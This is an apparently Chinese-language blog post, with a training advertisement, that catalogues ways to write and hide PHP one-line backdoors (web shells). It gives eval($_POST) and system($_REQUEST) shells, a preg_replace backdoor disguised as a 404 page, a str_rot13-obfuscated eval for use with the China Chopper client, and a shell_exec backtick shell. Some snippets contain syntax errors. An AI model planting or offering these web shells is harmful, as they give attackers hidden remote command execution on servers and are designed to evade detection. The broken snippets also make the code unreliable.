PHP一句话后门隐藏技术

2019年03月21日 22:58:01 作者:必火 阅读数:37528
网络安全渗透测试北京实地培训:报名加微信:bihuoedu,手机:15320003515。推荐学员入学奖励现金1000元

0x01: eval函数构造的后门

最为常见,最多使用

<?php eval($_POST['nvhack'];?>
<?php @eval($_POST['nvhack']);?>//容错代码
<?php system($_REQUEST['nvhack']);?>//执行命令

0x02: 利用404ye面隐藏后门

<?php
@preg_replace("/[pageerror]/",$_POST['error'],'nvhack.com');
header('HTTP/1.1 404 Not Found');
?>

0x03: 无特征隐藏一句话后门

通过编码转换 str_rot13('riny') 即编码后的eva,使用中国菜刀连接。密码为nvhack

<?php $nvhack = $_POST['nvhack']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($nvhack)','add');?>

0x04:利用shell_exec函数的后门

要注意 ,php.ini 配置文件中的disable_funcgtions 没有禁用shell_exec

<?php
$nvhack = $_GET['r'];
echo `$nvhack`;
?>